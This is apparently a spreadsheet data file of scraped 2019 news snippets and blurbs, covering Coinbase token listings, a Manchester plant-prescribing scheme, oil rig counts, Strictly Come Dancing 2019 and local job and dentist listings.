    <t>Coinbase has announced the possible addition of eight new tokens to its current collection. Per a blog posting from the exchange, Coinbase is exploring the addition of Algorand, Cosmos, Dash, Decred, Matic, Harmony, Ontology, and Waves. Currently, coins listed on its non-Pro interface include Bitcoin, Bitcoin Cash, Ethereum, Ethereum Classic, USD Coin, XRP, Stellar, Zcash, 0x, Litecoin, and the Basic Attention Token. Coinbase’s announcement follows new token listing guidelines posted last September. Per a follow-up blog post, Coinbase wrote: “Because listing announcements will become more frequent, we expect to publicly announce the addition of new assets only at or near the time of public launch across one or more Coinbase products.” In other words, each of these products is very likely to be listed. The company is currently vetting each product based on in-house criteria. The exchange hopes to add some 90% of current coins on the market onto the exchange. The company’s guidelines act as a useful transition onto the exchange for customers, developers, and Coinbase. Even if listed, coins may only be available in certain locations. Each coin will be subject to a case by case study based on jurisdictional conditions, the company said. Brian Armstrong image via CoinDesk archives</t>
  </si>
  <si>
    <t>Plants prescribed to help people with anxiety and depression Original Source Plants are being prescribed to help people with mental health problems (Picture: Getty Images/iStockphoto) We love houseplants and know they have lots of benefits – from air purifying to just making your rented flat feel a little more homely. And now GP practice in Manchester is prescribing plants to help people with anxiety, depression and loneliness. The idea is that patients get herbs, veg and pot plants to care for and they then bring it back to the surgery to transfer it to the communal garden. The new scheme – believed to be a first in the country – gives patients a chance to join in with further gardening and social activities. It’s based on the idea that spending time in green spaces can help to lift your mood. It’s been launched by Cornbrook Medical Practice in inner-city Hulme, where many patients live in flats and may not have access to gardens or greenery. Augusta Ward, 31, a medical secretary at the practice, said: ‘The plants we will be giving people are mainly herbs – things like lemon balm and catmint, which all have mindful qualities. ‘Having something to care for brings so many benefits to people – especially for those who may not have a garden or be able to have pets. ‘The plant is then a reason to come back to the surgery and get involved in all the other activities in our garden and make new friends.’ The idea is backed by the city’s health commissioners, who want to promote community support or ‘social prescribing’ as one of the holistic ways to improve well-being in the city. Many of the plants for the scheme have been donated or have been funded through the social enterprise group Sow the City. Dr Philippa James, one of the surgery’s GPs, said: ‘I’ve seen how our patients relax in the garden – and how they then get involved in wider events like picking litter, which all adds to pride in our area. More: Health ‘There’s a lot of evidence now about how two hours a week in a green space can lift mood – and then that too has physical, mental and emotional benefits. That’s something we need to harness.’ Dr Ruth Bromley, GP and chair of Manchester Health and Care Commissioning, a partnership between Manchester Clinical Commissioning Group and Manchester City Council, added: ‘So much of what keeps people happy and well isn’t medical. ‘That’s why ideas like this one are so wonderfully effective, building on what is best about our communities and supporting patients close to where they live.’ MORE: Husband is looking to create ‘Calendar Girls’ of women who had miscarriages for wife who’s suffered seven times MORE: How to turn your tiny paved yard into a beautiful garden window.fbApi = (function () var fbApiInit = false; var awaitingReady = []; var notifyQ = function () var i = 0, l = awaitingReady.length; for (i = 0; i &lt; l; i++) awaitingReady[i](); ; var ready = function (cb) if (fbApiInit) cb(); else awaitingReady.push(cb); ; var checkLoaded = function () return fbApiInit; ; window.fbAsyncInit = function () FB.init( appId: '176908729004638', xfbml: true, version: 'v2.10' ); fbApiInit = true; notifyQ(); ; return 'ready' : ready, 'loaded' : checkLoaded ; )(); (function () function injectFBSDK() if ( window.fbApi &amp;&amp; window.fbApi.loaded() ) return; var d = document, s = 'script', id = 'facebook-jssdk'; var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.async = true; js.src = "http://connect.facebook.net/en_US/sdk.js"; fjs.parentNode.insertBefore(js, fjs); if ('object' === typeof metro &amp;&amp; 'article' === metro.pageData.type) window.addEventListener('metro:scroll', injectFBSDK, once: true); else window.addEventListener('DOMContentLoaded', injectFBSDK, once: true);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Plants prescribed to help people with anxiety and depression appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Sam Jeremic</t>
  </si>
  <si>
    <t>It’s changed, but open-minded folk will still find plenty to enjoy.</t>
  </si>
  <si>
    <t>Michael R. Sisak and Michael Balsamo</t>
  </si>
  <si>
    <t>Jail policy called for checks on Epstein every 30 minutes, but investigators have learned those weren’t done for several hours in the hours before he was discovered.</t>
  </si>
  <si>
    <t>Widespread damaging winds will start in southern parts of South Australia on Thursday, sweeping through Victoria and up into New South Wales on Friday and Saturday.</t>
  </si>
  <si>
    <t>Via Fox News: In the hours before accused sex trafficker Jeffrey Epstein’s apparent suicide early Saturday morning, the two corrections officers assigned to watch over the disgraced financier in a special unit of New York City’s federal lockup were reportedly in the midst of working overtime shifts — and one of the individuals wasn’t a […]</t>
  </si>
  <si>
    <t>The complex will be used for training by Japan’s men’s and women’s national football teams ahead of the Olympics, and Argentina’s rugby team plans …</t>
  </si>
  <si>
    <t>Harold Hamm, CEO of Continental Resources speaks during the third day of the Republican National Convention in Cleveland, Wednesday, July 20, 2016. (AP Photo/J. Scott Applewhite) ASSOCIATED PRESS As of this writing on August 15, the DrillingInfo Daily Rig Count has now dropped by 201 rigs since its most recent peak last November 8. That's a 17% decline, something the industry hasn't experienced in so few months since 2015. The question now becomes whether or not oil and gas producers need to idle even more rigs going forward in order to help keep prices propped up at semi-healthy levels. One of the industry's most prominent and vocal CEOs - Harold Hamm of Continental Resources - believes it does. Speaking at the Enercom Oil and Gas Conference in Denver on Tuesday, Hamm told the audience that domestic producers "need to row our own boat,” he said. “We need to make sure we don’t oversupply the market.” Hamm noted that investor pressure on corporate producers to exercise more capital discipline had been one of the drivers behind this year's drilling slowdown, and said that that trend needs to continue: “Capital discipline is more important now than at any time I’ve seen it,” he was quoted by Reuters as saying. “We can oversupply the market, and we have,” he said, referring to the prominent role U.S. shale producers now play in overall global crude supply. Hamm predicted that the idling of rigs would continue throughout the remainder of 2019, saying "we're heading for 800" onshore rigs, referring to the weekly rig count conducted by Baker Hughes , which sat at 909 as of August 9. By comparison, the DrillingInfo count, which is compiled using a different method, came in at 970 on August 15. Hamm's remarks came as domestic producers struggle to deal with increased volatility and uncertainty in the crude price market, caused in large part by the ongoing trade conflict between the United States and China, and resultant apparent slowing of China's economy. These and other bearish economic factors have led both the U.S. Energy Information Administration (EIA) and the U.N. International Energy Agency (IEA) to issue downward revisions in their demand forecasts for the remainder of 2019. The IEA, in its latest Oil Market Report, also revised its crude market supply/demand projection for 2020 to a net surplus of .5 million barrels of oil per day. The agency had previously projected a .5 million supply deficit for 2020. Thus, producers can expect ongoing volatility in the markets going forward. Such volatility makes the challenge of planning a company's capital budgets and business beyond a few months that much more difficult. It also makes it harder for companies with active hedging programs (a practice Hamm himself has always slammed and avoided) to find counter-parties willing to enter into contracts at attractive longer-term prices. The result of all of these factors and market unpredictability is likely to be that Hamm will get his wish: We will almost certainly see the U.S. rig count continue to decline, at least for the remainder of 2019. Whether enough rigs will be idled to create a corresponding slowing of domestic supply growth that is significant enough to begin to stabilize international markets seems far less likely. Despite the idling of those 201 rigs over the last 10 months, U.S. overall production levels have continued to grow at such a pace that the industry appears likely to increase supply by about 1 million barrels of oil per day during 2019. The EIA continues to project that U.S. production will grow at a healthy pace in the coming few years as well. But those projections assume crude prices will remain at or higher than current levels. Harold Hamm just sounded a warning of his skepticism about the accuracy of those assumptions. Will the rest of the industry listen? "&gt; Harold Hamm, CEO of Continental Resources speaks during the third day of the Republican National Convention in Cleveland, Wednesday, July 20, 2016. (AP Photo/J. Scott Applewhite) ASSOCIATED PRESS As of this writing on August 15, the DrillingInfo Daily Rig Count has now dropped by 201 rigs since its most recent peak last November 8. That’s a 17% decline, something the industry hasn’t experienced in so few months since 2015. The question now becomes whether or not oil and gas producers need to idle even more rigs going forward in order to help keep prices propped up at semi-healthy levels. One of the industry’s most prominent and vocal CEOs – Harold Hamm of Continental Resources – believes it does. Speaking at the Enercom Oil and Gas Conference in Denver on Tuesday, Hamm told the audience that domestic producers “need to row our own boat,” he said. “We need to make sure we don’t oversupply the market.” Hamm noted that investor pressure on corporate producers to exercise more capital discipline had been one of the drivers behind this year’s drilling slowdown, and said that that trend needs to continue: “Capital discipline is more important now than at any time I’ve seen it,” he was quoted by Reuters as saying. “We can oversupply the market, and we have,” he said, referring to the prominent role U.S. shale producers now play in overall global crude supply. Hamm predicted that the idling of rigs would continue throughout the remainder of 2019, saying “we’re heading for 800” onshore rigs, referring to the weekly rig count conducted by Baker Hughes , which sat at 909 as of August 9. By comparison, the DrillingInfo count, which is compiled using a different method, came in at 970 on August 15. Hamm’s remarks came as domestic producers struggle to deal with increased volatility and uncertainty in the crude price market, caused in large part by the ongoing trade conflict between the United States and China, and resultant apparent slowing of China’s economy. These and other bearish economic factors have led both the U.S. Energy Information Administration (EIA) and the U.N. International Energy Agency (IEA) to issue downward revisions in their demand forecasts for the remainder of 2019. The IEA, in its latest Oil Market Report, also revised its crude market supply/demand projection for 2020 to a net surplus of .5 million barrels of oil per day. The agency had previously projected a .5 million supply deficit for 2020. Thus, producers can expect ongoing volatility in the markets going forward. Such volatility makes the challenge of planning a company’s capital budgets and business beyond a few months that much more difficult. It also makes it harder for companies with active hedging programs (a practice Hamm himself has always slammed and avoided) to find counter-parties willing to enter into contracts at attractive longer-term prices. The result of all of these factors and market unpredictability is likely to be that Hamm will get his wish: We will almost certainly see the U.S. rig count continue to decline, at least for the remainder of 2019. Whether enough rigs will be idled to create a corresponding slowing of domestic supply growth that is significant enough to begin to stabilize international markets seems far less likely. Despite the idling of those 201 rigs over the last 10 months, U.S. overall production levels have continued to grow at such a pace that the industry appears likely to increase supply by about 1 million barrels of oil per day during 2019. The EIA continues to project that U.S. production will grow at a healthy pace in the coming few years as well. But those projections assume crude prices will remain at or higher than current levels. Harold Hamm just sounded a warning of his skepticism about the accuracy of those assumptions. Will the rest of the industry listen? Source link</t>
  </si>
  <si>
    <t>The price will automatically change to $6.97 once the game is put in cart and you go to checkout - it applies a Summer Sale coupon automatically (it does for me). If it doesn't use the code "FANATICAL10" According to ITAD this is the all-time lowest price thus far. Tomb Raider (2013) is also on sale for a pretty good price: $4.03 (after the voucher): https://www.fanatical.com/en/game/tomb-raider From the website: SEGA brings you the ultimate celebration of past and future in Sonic Mania, an all-new 2D Sonic adventure running at a crisp 60FPS with stunning HD retro-style graphics. The game is a perfect blend of the old and the new, not only with fantastic stage design and gorgeous visuals but also inspiring music from the older Sonic games that have been brilliantly translated, with all the new additions to the game seamlessly gelling with the old! Sonic Mania collates the old sonic games – Sonic the Hedgehog 2, Sonic the Hedgehog 3, Sonic CD, Sonic and Knuckles and even a mini game from the spin off game Dr. Robotnik's Mean Bean Machine – in one place for players to get a taste of the good old days. RETRO FEEL Sonic Mania is a side-scrolling platformer game in the style of the early Sonic games released for the Sega Genesis. Players can select one of three playable characters, each of which have their own unique abilities – Sonic can perform a ‘drop dash’ which sends him rolling in a dash after a jump, Tails can fly and swim, and Knuckles can glide and climb walls. As with Sonic the Hedgehog 2, players can either play as Sonic and Tails simultaneously, or allow Tails to be independently controlled by a second player. The game features unlockable gameplay modifiers, including the option to use Sonic's abilities from Sonic CD and Sonic the Hedgehog 3 in place of the drop dash, and "&amp; Knuckles" mode, which allows the character Knuckles to be played simultaneously with Sonic. SOMETHING OLD, SOMETHING NEW, SOMETHING BLUE Sonic Mania takes place over twelve different zones, of these zones there are eight ‘remixed’ zones, such as Green Hill Zone from the original Sonic the Hedgehog, alongside four original zones. Remixed zones are made up of a combination of the old and new, with recycled gimmicks and ideas from past games as well as new elements. Players must guide their characters through the zones which are split into two acts, each with various obstacles and enemies, in order to reach the end. Each act ends with the players taking part in a boss battle against Dr Eggman or one of his elite robots. As with the original games, golden coins are collected by players and act as a form of health. A player will lose rings if they are hit by an enemy and die if they have less than one ring. If a player is hit then the rings will scatter, and players must collect them again before they vanish. Rings, elemental shields and power ups are scattered throughout the levels, powerups include invincibility and faster running speeds. The games storyline is laid out through various short cutscenes which happen in game at the end of each level. In each level there are giant rings hidden for players to active a pseudo-3D special level. In these levels players must collect colored spheres that increase their speed as well as dodge various obstacles in an effort to catch a UFO. The UFO carries a Chaos Emerald which players must collect in order to activate the games true ending. Players must retain at least one ring to play through the special level – if they lose all of their rings, the level ends. Completing the special level also gives players a gold or silver medal depending on their performance. The game also offers a time attack mode in which players must complete levels in as little time as possible, this features a leaderboard online in which players can post their best time and compete against other players best times. The Blue Sphere bonus stages from Sonic the Hedgehog 3 also return, accessed by entering a portal that appears when the player passes a checkpoint while carrying 25 or more rings. There is also a multiplayer mode which is split screen allowing two players to race each other. The game also features an unlockable multiplayer mini game called Mean Bean. YOUR OFFICIAL SONIC MANIA STEAM KEY GIVES YOU: Three classic and well-loved characters to choose from: Play as Sonic the Hedgehog, Tails the fox or Knuckles the echidna. Insanely retro levels for the three heroes to navigate along, with new and improved levels creating the perfect balance between the old and the new. An equally retro soundtrack that will have your head bobbing rhythmically for weeks. Critically acclaimed graphics that are both old school and modern. An all new Dr Eggman plot for players to foil. 90s style 2D platforming, riddled with nostalgia and bursting with new exciting features. Enjoy!</t>
  </si>
  <si>
    <t>Source: https://www.cnet.com/news/legendary-liberty-inside-the-only-remaining-liberty-ship-from-d-day/#ftag=CAD590a51e Legendary Liberty: Inside the only remaining Liberty ship from D-Day – CNET Built in just 6 weeks, the SS Jeremiah O’Brien survived being a part of the D-Day invasion fleet and still cruises nearly 80 years later. Here’s a look inside. Source: https://www.cnet.com/news/legendary-liberty-inside-the-only-remaining-liberty-ship-from-d-day/#ftag=CAD590a51e The post Legendary Liberty: Inside the only remaining Liberty ship from D-Day – CNET appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>According to an ‘exclusive’ from Football Insider, Brentford look set to make a move for ex-Newcastle United flop Emmanuel Riviere. The 29-year-old is available on a free after being released by Mainz over the summer and it’s claimed Brentford are keen to sign the striker after bagging just 2 goals in their opening 4 games of the new Championship season. They’re yet to replace Neil Maupay – who completed a £20m move to Brighton a few weeks ago after bagging 25 goals and 8 assists for Brentford last season – but they won’t be getting a prolific striker in Riviere. Not only did the Frenchman score just 3 goals in 31 appearances on Tyneside, he failed to score in 17 appearances on loan with Osasuna across 2016/17. The former Monaco man – who cost us £6m back in 2014 – then completed a permanent move to Metz two years ago. He bagged 5 goals in 28 Ligue 1 appearances in 2017/18, but managed to score just twice in 15 Ligue 2 appearances last season – something which saw him released by the French second tier side earlier this summer. Considering Riviere has scored as many goals since 2013 (25) as Neil Maupay scored for Brentford in the league last season (25), it’s fair to say this is pretty desperate replacement for the Bees. (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Ariana Grande makes emotional return to Manchester – CNN – Gooruf Original Source Article summary I had so much more to say but I’m really very overwhelmed. ” So thank you.” “Obviously Manchester holds a very special place in my heart,” she added. She was made the first “honorary citizen” of the city days later, in recognition of her response to the event. Click here to read the full article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Ariana Grande makes emotional return to Manchester – CNN – Gooruf appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Andrew Webster</t>
  </si>
  <si>
    <t>The Souths captain escaped suspension on Tuesday night. But he still sits at a career crossroad.</t>
  </si>
  <si>
    <t>submitted by /u/iamvinoth [link] [comments] Apple logo to be placed in the middle according to case makers.</t>
  </si>
  <si>
    <t>Opera Australia has unveiled a broad-ranging 2020 program that includes two musicals as part of its constant push to attract audiences.</t>
  </si>
  <si>
    <t>STRICTLY COME DANCING has signed up Made in Chelsea cast member Jamie Laing for the newest series and he spoke out about this new opportunity on Loose Women earlier today. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Officers say the vehicle was travelling eastbound in a westbound lane near Bishopsgate Road in Brant County.</t>
  </si>
  <si>
    <t>Eamonn Tiernan</t>
  </si>
  <si>
    <t>Chaz Mostert pinched pole but was trailing McLaughlin by the first corner as the DJR Team Penske star powered to his 15th win in 21 races this season.</t>
  </si>
  <si>
    <t>Actor highlighted Marvel Entertainment chairman donated large amounts to US president See full article at Independent.co.uk » The post Armie Hammer calls out Marvel chairman for financially supporting Trump appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Billionaire investor William Ackman, whose portfolio has gained almost 50% this year, said his fund can keep delivering "high, long-term" returns, and he expects that a newly disclosed stake in Berkshire Hathaway Inc will help boost gains.</t>
  </si>
  <si>
    <t>Sky UK eyes content UHD workflow boost with Iris integration | News Original Source Sky UK has unveiled an upgrade to its ultra-high definition (UHD) content workflows in an aim to boost efficiency. Sky has integrated GrayMeta’s Iris Media Platform into its UHD, HDR and IMF content workflows, meaning its QC operators will be able to monitor technical metadata and quickly produce audio loudness analysis. The platform, which is an enterprise media playback and QC solution, uses open APIs to collaborated and deliver content through the entire life cycle. It delivers true reference playback of complex IMF packages and other computationally heavy files in both SDR and HDR formats. “GrayMeta has helped us handle the complexities of IMF with ease and validate important HDR metadata. The reference player is used to drive quality control through our supply chain and provides us the confidence that our viewers are getting the best experience when they watch our UHD content,” says Ashley Ross, technical operations manager at Sky. For GrayMeta, which is an AI-powered metadata company that aims to help broadcasters monetize their assets, the opportunity to work with Sky was key. According to the firm, Iris can also improve collaboration across QC teams, removing inefficiencies and costs while reducing time to QC. Matt Eaton, managing director of GrayMeta, said: “It’s been great working with Sky to understand how our Iris Media Platform could integrate into their supply chain using our API’s which now helps their QC teams ensure UHD and IMF content is being delivered at optimum quality. Iris has helped automate some of the manual QC operations allowing the team more time to address other elements of their role.”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Sky UK eyes content UHD workflow boost with Iris integration | News appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Farah went down three times in the opening 25 minutes of the Wests Tigers' 18-16 loss to Canterbury, before eventually succumbing and limping from the field.</t>
  </si>
  <si>
    <t>The farm boy who has grown from the smallest player in his team to the AFL's biggest midfielder and from draft-camp dawdler to being a part of conversations about who is the league's best player.</t>
  </si>
  <si>
    <t>Aug. 21, 2019 Imagine two sitting Republican Congresspeople planned a trip to a foreign country in conjunction with a nongovernmental organization. Imagine that particular NGO had a long history of Jew hatred: It had run a piece on its website quoting anti-Semitic myths about Jews imbibing Christian blood, republished a neo-Nazi article decrying the “Jew-controlled entertainment media” and suggested that “honor” was the proper response to a terrorist who murdered 38 Israelis, including 13 children. Imagine that these two Congresspeople tweeted a cartoon from a cartoonist so anti-Semitic he won second prize at Iran’s Holocaust denial cartoon contest. Imagine that these Congresspeople had themselves engaged in anti-Semitic slurs… Click here for full article</t>
  </si>
  <si>
    <t>Android Authority The post Smartphone quiz: Name that flagship killer! appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Mental health awareness matters Original Source Anxiety, bipolar disorder, depression, eating disorders, PTSD and more are all things that can be controlled. Depression is another issue that is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Mental health awareness matters appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Atomik is made with grain and water from the abandoned area around the damaged nuclear power plant. The post Chernobyl vodka: First consumer product made in exclusion zone appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A new podcast details the 12 years Sarah Edmondson spent rising through the ranks of NXIVM, a cult whose leader was found guilty of sex trafficking.</t>
  </si>
  <si>
    <t>Hump Day buddy Play Warm-up A) 2 Sets of : 10 x Cat-Cow 10 x Rocking Adductor 10 x Wrist Planches 10 x T spine rotations 10 x Lat Pulses 10 x Quadruped scap push-ups B) Power Snatch Tech Hang Snatch (Weight) E2M x 6 Sets: 3 x Snatch Pull 2 x Power Snatch 1... The post WOD WOD, August 14, 2019 appeared first on CrossFit Chamber.</t>
  </si>
  <si>
    <t>It’s almost time to dust off the glittery leotard and the tighten the screws on your tap shoes – Strictly Come Dancing 2019 is almost upon us. Over the coming months, a line-up of famous (and… not so famous) faces will gradually be whittled down in their quest to follow in Stacey Dooley’s footsteps and claim the glitterball trophy. Ahead of this series the BBC announced a new judge, a new professional and, of course, 15 celebrities anxiously awaiting their time to take to the floor – here’s everything you need to know. When does Strictly Come Dancing start? As always, Strictly Come Dancing begins with a suitably glitzy red carpet launch event, which this year falls on Monday 26 August. The date of the main shows has not been confirmed, although the BBC announced that they will kick off in September. However, the show has followed the same format for the past six series, with the launch show airing early in September and the main event getting underway a fortnight later. This pattern makes it overwhelmingly likely that the launch will be shown on Saturday 7 September, and the live shows beginning on Saturday 21 September. Last year’s Strictly Come Dancing celebrities take part in the glitzy red carpet launch event (Getty Images) Given that the number of couples has remained the same throughout recent editions, and the format shows no signs of changing, this would mean the grand final will fall on Saturday 14 December. For the first four series, the results show was broadcast live after the main dances Saturday night, following a brief break to allow the public vote. Since 2007 (apart from the revamped 2010 series), the results show has aired on Sunday – however, it is still filmed in the studio on the Saturday night after voting closes. Despite this, the four judges and presenters Tess Daly and Claudia Winkleman perform an illusory outfit change, and craftily refer to the dances as having been performed “last night”. This year’s Strictly celebrities: (Top, L-R) Mike Bushell, Jamie Laing, Karim Zeroual, Alex Scott, Emma Barton; (Middle) Dev Griffin, Emma Thynn Viscountess Weymouth, Michelle Visage, James Cracknell, Saffron Barker; (Bottom) Chris Ramsey, Will Bayley, Catherine Tyldesley, Anneka Rice and David James (BBC/PA Wire) Who’s in the Strictly 2019 line-up? Despite the inevitable frenzy of speculation and leaks, the BBC opted to drip feed this year’s celebrity contestants over a succession of days through the likes of The One Show, Good Morning Britain and various BBC radio outlets. The line-up contains an Olympic and Paralympic gold-medallists, a former England goalkeeper, soap actors and, for the first time, a viscountess. Here it is in full: Anneka Rice (actress and broadcaster) Dev Griffin (radio DJ) James Cracknell (Olympic rower) David James (former England footballer) Chris Ramsey (comedian) Emma Barton (EastEnders actor) Saffron Barker (social media influencer) Catherine Tyldesley (Coronation Street actor) Mike Bushell (sports TV presenter) Viscountess Emma Thynn (model and aristocrat) Karim Zeroual (TV presenter) Will Bayley (Paralympic table tennis star) Michelle Visage (TV star and singer) Jaime Laing (reality TV personality) Alex Scott (former England footballer and pundit) Who are the Strictly 2019 judges? After seven years as a permanent judge on the show, former ballerina Darcey Bussell stood down earlier this year, citing a desire to focus on her “many other commitments in dance”. Motsi Mabuse, an experienced dancer and sister of Strictly professional Oti, was announced as her replacement in July. New Strictly judge Motsi Mabuse joins her sister Oti (one of the professional dancers) on the show (BBC) Mabuse has been a judge on the German version of the show, known there as Let’s Dance, since 2011, and declared herself “overjoyed” at joining the UK panel. She joins Bruno Tonioli and Craig Revel Horwood, who have both been on the show since it launched in 2004, and Shirley Ballas, who replaced Len Goodman (one of the panel’s other founding fathers) after he stood down in 2016. A select batch of the Strictly professionals took part in the live tour earlier this year (BBC) Who are the Strictly 2019 professionals? There have also been some changes in the line-up of Strictly professional dancers this year, following the departure of Pasha Kovalev following the last series. He was replaced by the Latin dancer Nancy Xu, who starred in the hit West End and Broadway show Burn The Floor. She joins an 18-strong cohort of pros – a handful of reserve dancers are not allocated celebrity partners, and have to make do with popping up in the intimidatingly proficient group dances throughout the series. New Strictly professional Nancy Xu fills the void left after the departure of Pasha Kovalev (BBC) Since Brendan Cole stepped down after the 2017 series, Anton du Beke is the only professional to have appeared in every edition of Strictly, although he has never finished higher than third. The celebrities will be clamouring to be partnered up with Kevin Clifton who triumphed last year with Stacey Dooley – the most successful of the pros, he only once been outside the top two in his six series. Here is the full professionals line-up: AJ Pritchard Aljaž Škorjanec Amy Dowden Anton Du Beke Dianne Buswell Giovanni Pernice Gorka Marquez Graziano Di Prima Janette Manrara Johannes Radebe Karen Clifton Katya Jones Kevin Clifton Luba Mushtuk Nadiya Bychkova Neil Jones Oti Mabuse Nancy Xu More Strictly Come Dancing Your Strictly Come Dancing 2019 line-up cheat sheet Strictly Come Dancing in August? Give us a break! Strictly Come Dancing: Our predictions for the competition ahead What is a viscountess? What Strictly's Emma Weymouth's title means Michelle Visage: who is the Strictly 2019 contestant? Who is Saffron Barker, the new Strictly contestant and YouTube star? The post When does Strictly 2019 start? Line-up, professionals, judges, BBC start date and everything else about the new series appeared first on inews.co.uk. The post When does Strictly 2019 start? Line-up, professionals, judges, BBC start date and everything else about the new series appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>The Rail Tram and Bus Union has called off two scheduled strikes, but a four-hour stoppage 'remains on the table'.</t>
  </si>
  <si>
    <t>Despite the McLaren F1 Team having a much improved 2019 campaign, Carlos Sainz Jr. does not believe the team will break away from the midfield pack in the second half of the season. McLaren currently sit fourth in the Constructors’ Championship after the first twelve races of the season, with Sainz himself sitting seventh in the Drivers’ Championship, thanks mainly to a strong run of races that have culminated in a pair of fifth place finishes in the German and Hungarian Grand Prix. The team has already exceeded its points tally of 2018, where Fernando Alonso and Stoffel Vandoorne could only muster sixty-two points between them, with Sainz and Lando Norris having already secured eighty points in twelve races. They currently sit a comfortable thirty-nine points clear of fifth placed Scuderia Toro Rosso in the Constructors’ Championship, but Toro Rosso, Alfa Romeo Racing, Renault F1 Team, Racing Point F1 Team and Haas F1 Team are all closely matched on track and are all involved in the battle that McLaren currently head. Sainz hopes McLaren are able to improve their car across the remaining nine races of the season, but the Spaniard knows it will be difficult to pull away from the chasing pack as they will also bringing updates and new components to each race. “I don’t think we are going to be able to break out of the midfield in the second half of the season,” said Sainz to Motorsport.com. “We might bring a few tenths to the car which will be great, but everyone else is going to bring them, so we need to be careful.” Sainz says the most important thing McLaren need to do in the remaining events is learn more about the MCL34 in order to arrive in 2020 with an even better machine so they can then look at closing the gap to the three teams ahead of them. “What we need to make sure is that we learn the right steps to do on the car this year and learn them for next year,” said the Spaniard. “That is the main target for the second half of this season: learn about this car to make sure that we put all the things in the right place for next year’s car.”</t>
  </si>
  <si>
    <t>We’re looking for passionate, reliable, hard-working cooks &amp; drivers to join and expand our team at 1for1 Pizza It’s a Fun, relaxed , team driven environment focused towards delivering the perfect guest experience Our kitchen is equipped with Hi-Tech machines from conveyor ovens to dough stretchers and call centre agents are available to answer the .. Read more</t>
  </si>
  <si>
    <t>Formula 2 driver Anthoine Hubert has been killed in a crash at the Belgian Grand Prix, motorsport’s governing body the FIA says. The post Formula 2: Anthoine Hubert killed in Belgium crash appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>MY TRIP TO NYC | SKAI JACKSON The post MY TRIP TO NYC | SKAI JACKSON appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>DRIVERS could be land a hefty fine for having sex in their car, states a report. Daily Express :: Cars Feed Having sex in your car could land you a £5,000 fine</t>
  </si>
  <si>
    <t>Richard Glover</t>
  </si>
  <si>
    <t>Should we ban watching drama, particularly period drama, on our mobile phones?</t>
  </si>
  <si>
    <t>We are hiring part time and full time employees to join our team as kitchen helpers for our pizza restaurant located in downtown Calgary. Minimum training and able to start immediately. Job skills and requirements: • Minimum 1yr experience (preferably at pizza shop) • Friendly attitude • Work as a team and be able to .. Read more</t>
  </si>
  <si>
    <t>Jaymes Todd followed Ms Dixon for more than four kilometres from just outside Flinders Street Station late on June 12 last year to Princes Park in Carlton North, where he attacked the 22-year-old as she walked across a soccer pitch.</t>
  </si>
  <si>
    <t>VITAMIN B12 helps the body to perform a number of vital functions. If left untreated, the condition can cause a number of serious health complications. Certain factors can make someone more prone to a deficiency. Daily Express :: Life and Style Feed Vitamin B deficiency: Six factors that could stop you absorbing the vitamin</t>
  </si>
  <si>
    <t>Henry Golding, Michelle Yeoh and Emma Thompson also appear in the film See full article at Independent.co.uk » The post Unheard George Michael song to appear in Emilia Clarke’s Wham!-themed romcom Last Christmas appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>RESEARCHERS have been urged to stop investigating whether our universe is a simulation, or face “total destruction”. The post Universe simulation alert: Why scientists should NEVER investigate ‘brain-in-a-vat’ theory appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The former White House Press Secretary Sarah will provide political commentary and analysis across all of Fox News' outlets.</t>
  </si>
  <si>
    <t>Sharif Fattah, 62, assaulted women who had sought his help for conditions including rashes, coughs, bites, back and pelvic pain and vitamin deficiencies.</t>
  </si>
  <si>
    <t>It's hard to know where to begin with this kooky new offering from Seven.</t>
  </si>
  <si>
    <t>After the floods that inundated Ontario cottage country, the province has appointed a committee that will provide recommendations to help protect the Muskoka Watershed.</t>
  </si>
  <si>
    <t>Mystic Journey will skip next Saturday’s Memsie Stakes as trainer Adam Trinder plots her path to the Cox Plate.</t>
  </si>
  <si>
    <t>The Liverpool to Crewe service could only crawl along at 10mph because of a fault with its brakes. The post Northern train delay a ‘British comical parody’ of the Speed movie appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Apple Dental, Pownall Janet, DDs – Still Waters Dental, King’s Cove Family Dental, Still Waters Dental Group, Kid Friendly Dentist Near Halton Hills Ontario Best Dentist in Halton Hills. RSS; Friendliest Dentist In Halton Hills. Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider. Preferred Dentist Near Halton Hills Preferred Dental Clinic Near Halton Hills Best Dentists in Georgetown, Halton Hills, ON – South Georgetown Dental Care, Georgetown Denture Clinic, Diana Dental, Lefebvre Ronald, Mountainview Dental, Argyll Dental Office, Georgetown Dentistry, Trenton A W Denturist, Georgetown Dental. . Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton The Best Dentists in Halton Hills Handpicked Top 3 Dentists in Halton Hills, ON. They face a rigorous 50-Point Inspection , which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Top Dental Clinic Near Halton Hills. John Kuo MD+PhD. Top IVF Fertility Specialist. Infertility+Ob/Gyn Board Certified. National&amp;Regional Awards. Find the best Dentist in Halton Hills, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local Dentist you are looking for. Top 